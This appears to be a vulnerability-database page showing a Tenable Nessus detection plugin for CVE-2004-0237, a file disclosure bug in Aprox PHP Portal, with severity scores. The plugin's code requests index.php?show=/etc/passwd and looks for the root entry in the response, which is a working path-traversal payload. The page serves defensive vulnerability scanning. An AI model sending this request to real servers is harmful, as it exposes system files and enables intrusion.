Lucene search
This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.APROX_PORTAL_FILE_DISCLOSURE.NASLHistoryFeb 02, 2004 - 12:00 a.m.
Aprox PHP Portal index.php Arbitrary File View
2004-02-0200:00:00
This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.
www.tenable.com
34
5 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:N/A:N
0.018 Low
EPSS
Percentile
88.2%
The remote host is running Aprox Portal - a PHP-based content management system.
There is a bug in this software that may allow an attacker to read arbitrary files on the remote web server with the privileges of the web user.
In addition, this software is reportedly vulnerable to a local file inclusion attack. However, Nessus has not checked for this.
#%NASL_MIN_LEVEL 70300
#
# (C) Tenable Network Security, Inc.
#
include('deprecated_nasl_level.inc');
include('compat.inc');
if(description)
{
script_id(12031);
script_cve_id("CVE-2004-0237");
script_bugtraq_id(9540);
script_version("1.22");
script_name(english:"Aprox PHP Portal index.php Arbitrary File View");
script_summary(english:"Checks Aprox Portal");
script_set_attribute(attribute:"synopsis", value:
"The remote host is running a PHP application that is affected by a
file disclosure vulnerability." );
script_set_attribute(attribute:"description", value:
"The remote host is running Aprox Portal - a PHP-based content
management system.
There is a bug in this software that may allow an attacker to read
arbitrary files on the remote web server with the privileges of the
web user.
In addition, this software is reportedly vulnerable to a local file
inclusion attack. However, Nessus has not checked for this." );
script_set_attribute(attribute:"see_also", value:"https://seclists.org/bugtraq/2004/Feb/38" );
script_set_attribute(attribute:"solution", value:
"Upgrading to Aprox Portal 4.00.08 or newer reportedly fixes the issue." );
script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:N/A:N");
script_set_cvss_temporal_vector("CVSS2#E:H/RL:U/RC:ND");
script_set_attribute(attribute:"exploitability_ease", value:"No exploit is required");
script_set_attribute(attribute:"exploit_available", value:"true");
script_set_attribute(attribute:"plugin_publication_date", value: "2004/02/02");
script_set_attribute(attribute:"vuln_publication_date", value: "2004/01/31");
script_set_attribute(attribute:"plugin_modification_date", value:"2021/01/19");
script_set_attribute(attribute:"plugin_type", value:"remote");
script_end_attributes();
script_category(ACT_GATHER_INFO);
script_copyright(english:"This script is Copyright (C) 2004-2021 Tenable Network Security, Inc.");
script_family(english:"CGI abuses");
script_dependencie("find_service1.nasl", "http_version.nasl");
script_require_ports("Services/www", 80);
script_exclude_keys("Settings/disable_cgi_scanning");
exit(0);
}
#
# The script code starts here
#
include("global_settings.inc");
include("misc_func.inc");
include("http.inc");
port = get_http_port(default:80);
foreach dir (cgi_dirs())
{
req = string(dir,"/index.php?show=/etc/passwd");
r = http_send_recv3(method:"GET", item:req, port:port);
if (isnull(r)) exit(0);
buf = strcat(r[0], r[1], '\r\n', r[2]);
if(egrep(pattern:".*root:.*:0:[01]:.*", string:buf)){
security_warning(port);
exit(0);
}
}
Related
cvelist
cvelist
CVE-2004-0237
2004-03-18 05:00:00
nvd
nvd
CVE-2004-0237
2004-11-23 05:00:00
cve
cve
CVE-2004-0237
2004-11-23 05:00:00
5 Medium
CVSS2
Attack Vector
NETWORK
Attack Complexity
LOW
Authentication
NONE
Confidentiality Impact
PARTIAL
Integrity Impact
NONE
Availability Impact
NONE
AV:N/AC:L/Au:N/C:P/I:N/A:N
0.018 Low
EPSS
Percentile
88.2%
Related for APROX_PORTAL_FILE_DISCLOSURE.NASL